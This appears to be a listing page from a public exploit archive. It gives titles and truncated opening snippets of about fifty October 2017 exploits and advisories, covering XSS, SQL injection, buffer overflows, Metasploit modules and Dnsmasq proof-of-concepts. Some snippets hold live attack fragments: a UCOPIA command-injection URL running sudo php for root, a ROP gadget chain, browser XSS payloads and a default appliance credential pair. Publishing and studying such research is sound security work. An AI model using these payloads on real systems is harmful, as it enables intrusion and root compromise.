E-Sic Software livre CMS - Cross Site Scripting

Exploit Title: E-Sic Software livre CMS - Cross Site Scripting Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...

Dreambox Plugin BouquetEditor - Cross-Site Scripting

Exploit Title: Vulnerability XSS - Dreambox Shodan Dork: Dreambox 200 Date: 12/10/2017 Exploit Author: Thiago "THX" Sena Vendor Homepage: https://www.dreamboxupdate.com Version: 2.0.0 Tested on: kali linux, windows 7, 8.1, 10 CVE : CVE-2017-15287 Vulnerabilty: Cross-site scripting XSS in plugin...

E-Sic Software livre CMS - 'f' SQL Injection

Exploit Title: E-Sic Software livre CMS - Sql Injection Date: 12/10/2017 Exploit Author: Elber Tavares fireshellsecurity.team/ Vendor Homepage: https://softwarepublico.gov.br/ Version: 1.0 Tested on: kali linux, windows 7, 8.1, 10 - Firefox Download...

ASX to MP3 3.1.3.7 - '.m3u' Local Buffer Overflow

Exploit Title: Buffer Overflow via crafted malicious .m3u file Exploit Author: Parichay Rai Tested on: XP Service Pack 3 CVE : CVE-2017-15221 Description ------------ A buffer overflow Attack possible due to improper input mechanism Proof of Concept ---------------- !/usr/bin/python This exploit...

Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro OfficeScan Remote Code Execution", 'Description' = %q This module exploits the authentication bypass and command injection vulnerabili...

Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Trend Micro InterScan Messaging Security Virtual Appliance Remote Code Execution", 'Description' = %q This module exploits the authentication bypa...

Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal

Exploit Title: Trend Micro Data Loss Prevention Virtual Appliance 5.2 Web Path Traversal Date: 10/11/2017 Exploit Author: Leonardo Duarte Contact: http://twitter.com/etakdc Vendor Homepage: http://la.trendmicro.com/la/productos/data-loss-prevention/ Version: 5.2 Tested on: Debian 9 Category:...

Complain Management System - Hard-Coded Credentials / Blind SQL injection

Exploit Title : Complain Management System Blind SQL Injection Date: 10 October 2017 Exploit Author: havysec Tested on: ubuntu14.04 Vendor: https://sourceforge.net/projects/complain-management-system/ Version: not supplied Download Software:...

binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow

Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read1byte-dwarf2-c/ Description: binutils is a set of tools necessary to build programs. The complete ASan output of the issue: nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE...

ClipShare 7.0 - SQL Injection

Exploit Title: ClipShare v7.0 - SQL Injection Date: 2017-10-09 Exploit Author: 8bitsec Vendor Homepage: http://www.clip-share.com/ Software Link: http://www.clip-share.com/ Version: 7.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected] Contact: https://twitter.com/8bitsec Relea...

PHP Melody 2.7.3 - Multiple Vulnerabilities

Vulnerabilities Summary The following advisory describes three 3 vulnerabilities found in PHP Melody version 2.7.3. PHP Melody is a “self-hosted Video CMS which evolved over the last 9 years. SEO optimization, unbeaten security and speed are advantages you no longer have to compromise on. A truly...

QNAP HelpDesk < 1.1.12 - SQL Injection

Vulnerability Summary The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier. QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the...

Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)

!/usr/bin/python import requests import re import signal from optparse import OptionParser class bcolors: HEADER = '\03395m' OKBLUE = '\03394m' OKGREEN = '\03392m' WARNING = '\03393m' FAIL = '\03391m' ENDC = '\0330m' BOLD = '\0331m' UNDERLINE = '\0334m' banner=""" / \ \ / / | | \ / / | | / | \ /...

VX Search Enterprise 10.1.12 - Remote Buffer Overflow

!/usr/bin/env python Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow Exploit Author : Revnic Vasile Email : revnicatgmaildotcom Date : 09-10-2017 Vendor Homepage : http://www.flexense.com/ Software Link : http://www.vxsearch.com/setups/vxsearchentsetupv10.1.12.exe Version :...

OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'OrientDB 2.2.x Remote Code Execution', 'Description' = %q This module leverages a privilege escalation on OrientDB to execute unsandboxed OS...

Rancher Server - Docker Daemon Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rancher Server - Docker Exploit', 'Description' = %q Utilizing Rancher Server, an attacker can create a docker container with the '/' path mounte...

ASX to MP3 converter < 3.1.3.7 - '.asx' Local Stack Overflow (DEP Bypass)

import struct,sys head =''' REF HREF="mms://site.com/ach/music/smpl/LACA-05928-002-tes''' offset 17375 junk = "A" 17375 0x1003df8e 0x774e1035 EIP="\x36\x10\x4e\x77" adjust="A" 4 def createropchain: ropgadgets = 0x73dd5dce, POP EAX RETN MFC42.DLL 0x5d091368, ptr to &VirtualProtect IAT COMCTL32.dll...

PyroBatchFTP 3.17 - Buffer Overflow (SEH)

!/usr/bin/python print "PyroBatchFTP Local Buffer Overflow SEH Server" Author: Kevin McGuigan @h3xagram Author Website: https://www.7elements.co.uk Vendor Website: https://www.emtech.com Date: 07/10/2017 Version: 3.17 Tested on: Windows 7 32-bit CVE: CVE-2017-15035 import socket import sys...

Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow

Sources: https://siberas.de/blog/2017/10/05/exploitationcasestudywildpooloverflowCVE-2016-3309reloaded.html https://github.com/siberas/CVE-2016-3309Reloaded Exploits for the recently-patched win32kfull!bFill vulnerability. Executing the Palette or Bitmap exploit will give you SYSTEM privileges on...

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...

WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)

function f let o = ; for let i in xx: 0 for i of 0 printoi; f;...

ClipBucket 2.8.3 - Remote Code Execution

Exploit Title: ClipBucket PHP Script Remote Code Execution RCE Date: 2017-10-04 Exploit Author: Esecurity.ir Vendor Homepage: https://clipbucket.com/ Version: 2.8.3 Exploit Code By : Meisam Monsef - Email : [email protected] - TelgramID : @meisamrce Usage Exploit : exploit.py...

EPESI 1.8.2 rev20170830 - Cross-Site Scripting

Exploit Title: Multiple Stored XSS in EPESI Date: 10/03/2017 Exploit Author: Zeeshan Shaikh Vendor Homepage: http://epe.si/ Software Link: http://epe.si/download/ Version: 1.8.2 rev20170830 CVE : CVE-2017-14712 to CVE-2017-14717 Category: webapps XSS 1 Tasks - Title Steps to recreate: 1...

Webkit (Safari) - Universal Cross-site Scripting

function Pewvar doc=open'parent-tab://apple.com';doc.document.body.innerHTML='';Click me! Exploit by Frans Rosén html data:text/html,function yx=open'parent-tab://google.com','top',x.document.body.innerHTML='';setTimeouty,100 -- function...

Fiberhome AN5506-04-F - Command Injection

Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION Date: 03.10.2017 Exploit Author: Tauco Vendor Homepage: http://hk.fiberhomegroup.com Version: RP2609 Tested on: Windows 10 Description: =========================================================================== Command injection is ...

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow

!/usr/bin/python ======================================================================================================================== Exploit Author: C4t0ps1s Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowCode execution Date: 03-10-2017 Twitter: @C4t0ps1s Email:...

Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting

MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com alert'Location origin:...

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection

Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14758 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...

Dnsmasq < 2.78 - Stack Overflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...

NPM-V (Network Power Manager) 2.4.1 - Password Reset

NPM-VNetwork Power Manager = 2.4.1 Reset Password Vulnerability Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: NPM-V Affected Version : 2.4.1 and below Vendor : http://www.china-clever.com Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125 Date:...

phpCollab 2.5.1 - Arbitrary File Upload

CVE-2017-6090 PhpCollab 2.5.1 Arbitrary File Upload unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. Arbitrary File Upload The phpCollab code does not correctly filter uploaded file contents. An...

UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape

CVE-2017-11321 UCOPIA Wireless Appliance You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with the following username and password: admin/bhu85tgb, and then execute the interface command. By logging in within these...

Dnsmasq < 2.78 - Integer Underflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...

Dnsmasq < 2.78 - Lack of free() Denial of Service

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...

Dnsmasq < 2.78 - 2-byte Heap Overflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open three terminals docker build -t dnsmasq . docker run --rm -t -i...

Dnsmasq < 2.78 - Information Leak

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available. Setup a simple network with...

UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution

Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia '/var/www/html/upload/bd.php;echo%20t As php is in sudoers without password... https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system"id";%27 Just push your ssh key and get nice root...

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection

Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...

Qmail SMTP - Bash Environment Variable Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Qmail SMTP Bash Environment Variable Injection Shellshock', 'Description' = %q This module exploits a shellshock vulnerability on Qmail, a public...

Dnsmasq < 2.78 - Heap Overflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...

UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation

CVE-2017-11322 UCOPIA Wireless Appliance 5.1.8 Privileges Escalation Asset description UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers. More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners...

phpCollab 2.5.1 - SQL Injection

CVE-2017-6089 PhpCollab 2.5.1 Multiple SQL Injections unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code...

Linux Kernel < 4.14.rc3 - Local Denial of Service

/ Exploit Title: Linux Kernelnrfrags was overwritten by ev-iferror = err 0xff in the condition where nlh-nlmsglen==0x10 and skb-len nlh-nlmsglen. POC: / include include include include include define NETLINKUSER 31 define MAXPAYLOAD 1024 / maximum payload size/ struct sockaddrnl srcaddr, destaddr...

Microsoft Word 2007 (x86) - Information Disclosure

Title: MS Office Word Information Disclosure Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP X86 and x64...

Microsoft Excel - OLE Arbitrary Code Execution

Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow

Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 !/usr/bin/python import socket import os...

FileRun < 2017.09.18 - SQL Injection

!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...

WordPress Plugin WPHRM - SQL Injection

Exploit Title: WordPress Plugin WPHRM - SQL Injection Dork: N/A Date: 29.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857 Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/ Version: N/A...

Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow

!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...

ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download

Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...